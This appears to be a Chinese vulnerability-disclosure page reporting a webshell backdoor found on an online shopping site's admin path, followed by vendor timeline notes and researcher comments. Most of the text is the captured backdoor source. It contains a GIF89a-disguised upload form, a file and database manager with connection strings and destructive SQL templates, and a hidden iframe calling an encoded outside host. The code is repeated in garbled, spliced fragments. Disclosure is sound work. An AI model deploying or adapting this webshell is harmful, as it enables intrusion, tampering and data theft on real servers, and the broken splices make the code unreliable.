2012-08-06: 细节已通知厂商并且等待厂商处理中 2012-08-11: 厂商已经主动忽略漏洞,细节向公众公开
昨天晚上本来打算找漏洞的。意外发现,居然抓了个后门。可怜的娃。我只能说强大的google hacking。
http://posgoo.happigo.com/admin/system/codeigniter/cts.php
gif89a<html><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><style type="text/css">body,td{font-family:tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px;}strong{font-size:12px;}a:link{color:#0066CC;}a:hover{color:#FF6600;}a:visited{color:#003366;}a:active{color:#9DCC00;}a{TEXT-DECORATION:none}table.itable{}td.irows{height:20px;background:url("index.php?i=dots") repeat-x bottom}</style></head><script type="text/javascript">function oCopy(obj){obj.select();js=obj.createTextRange();js.execCommand("Copy");};function sendtof(url){window.clipboardData.setData('Text',url);alert('复制地址成功,粘贴给你好友一起分享。');};function select_format(){var on=document.getElementById('fmt').checked;document.getElementById('site').style.display=on?'none':'';document.getElementById('sited').style.display=!on?'none':'';};var flag=false;function DrawImage(ImgD){var image=new Image();image.src=ImgD.src;if(image.width>0&&image.height>0){flag=true;if(image.width/image.height>=120/80){if(image.width>120){ImgD.width=120;ImgD.height=(image.height*120)/image.width;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}else {if(image.height>80){ImgD.height=80;ImgD.width=(image.width*80)/image.height;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}};};function FileChange(Value){flag=false;document.all.uploadimage.width=10;document.all.uploadimage.height=10;document.all.uploadimage.alt="";document.all.uploadimage.src=Value;};</script><body><center><form enctype="multipart/form-data" method="post" name="upform"><input style="width:208;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17" name=upfile type=file onchange="javascript:FileChange(this.value);"><br><input type="submit" value="" style="width:60;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17"><br> <br> <p><br> </p></form></center><script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输入!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body><span style="display:none"><iframe src=http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D/admin/jpg.asp width=0 height=0></iframe></body></html></html></body><iframe src= width=0 height=0></iframe></html></body></html><script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输入要新建的Mdb文件全名称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("E%69%70%67%6F%76%2E%63");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body></html></html></body><iframe src= eateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DNaeateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!eateMdb"){DName = prompt("请名称,eateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DNa",FName);top.hideform.FName.value = DNawidth=0 height=0></iframe></html></body></html><script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("E%69%70%67%6F%76%2E%63",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'usernafunction yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body></html></html></body><iframe src= width=0 height=0></iframe></html></body></ht吗?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输入要新建的Mdb文件全名称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body></html><html><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><style type="text/css">body,td{font-family:tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px;}strong{font-size:12px;}a:link{color:#0066CC;}a:hover{color:#FF6600;}a:visited{color:#003366;}a:active{color:#9DCC00;}a{TEXT-DECORATION:none}table.itable{}td.irows{height:20px;background:url("index.php?i=dots") repeat-x bottom}</style></head><script type="text/javascript">function oCopy(obj){obj.select();js=obj.createTextRange();js.execCommand("Copy");};function sendtof(url){window.clipboardData.setData('Text',url);alert('复制地址成功,粘贴给你好友一起分享。');};function select_format(){var on=document.getElementById('fmt').checked;document.getElementById('site').style.display=on?'none':'';document.getElementById('sited').style.display=!on?'none':'';};var flag=false;function DrawImage(ImgD){var image=new Image();image.src=ImgD.src;if(image.width>0&&image.height>0){flag=true;if(image.width/image.height>=120/80){if(image.width>120){ImgD.width=120;ImgD.height=(image.height*120)/image.width;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}else {if(image.height>80){ImgD.height=80;ImgD.width=(image.width*80)/image.height;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}};};function FileChange(Value){flag=false;document.all.uploadimage.width=10;document.all.uploadimage.height=10;document.all.uploadimage.alt="";document.all.uploadimage.src=Value;};</script><body><center><form enctype="multipart/form-data" method="post" name="upform"><input style="width:208;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17" name=upfile type=file onchange="javascript:FileChange(this.value);"><br><input type="submit" value="" style="width:60;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17"><br> <br> <p><br> </p></form>
很明显的一个上传。
清除后门,检查其他网站是否被人植入后门。
危害等级:无影响厂商忽略
忽略时间:2012-08-11 13:09
2012-08-17:已修复
@快乐购物股份有限公司 其他公司的都收过了,据说快乐购礼品很丰富啊,
二哥,你确定这个后门能用?当初的struts搞的吧!
@风萧萧 应该可以吧。有上传,还有后门,gif89a 你懂的。
很黄很暴力。http://www.happigo.com/momo.txt
怎么我忽悠的没人信呢? http://www.happigo.com/
@zeracker 不是我以前传的吧?没解析成功啊...
既然删除后忽略了,压力。
@快乐购物股份有限公司 有脾气就别删除,修复再忽略。必遭万人唾骂!
哇 什么情况呀~各位大牛 本人忙碌了一年 上周修了个年假 好像发生了一些沟通上的小问题~ 别急 我会补偿你们的~@zeracker 不要冲动 冲动是魔鬼~~ @momo 不存在删除后忽略 是系统自动的~ 各位 我回来了 你们懂的!!
@快乐购物股份有限公司 你搞个年休假,出了很多事!
。。。系统自动忽略哦,就说么,直接忽略后修复。。。这么霸气的举动必然会被乌云拉黑的。。
是新进员工操作失误导致的,不是故障修复后忽略的,在此对提交此漏洞的白帽子表示报歉!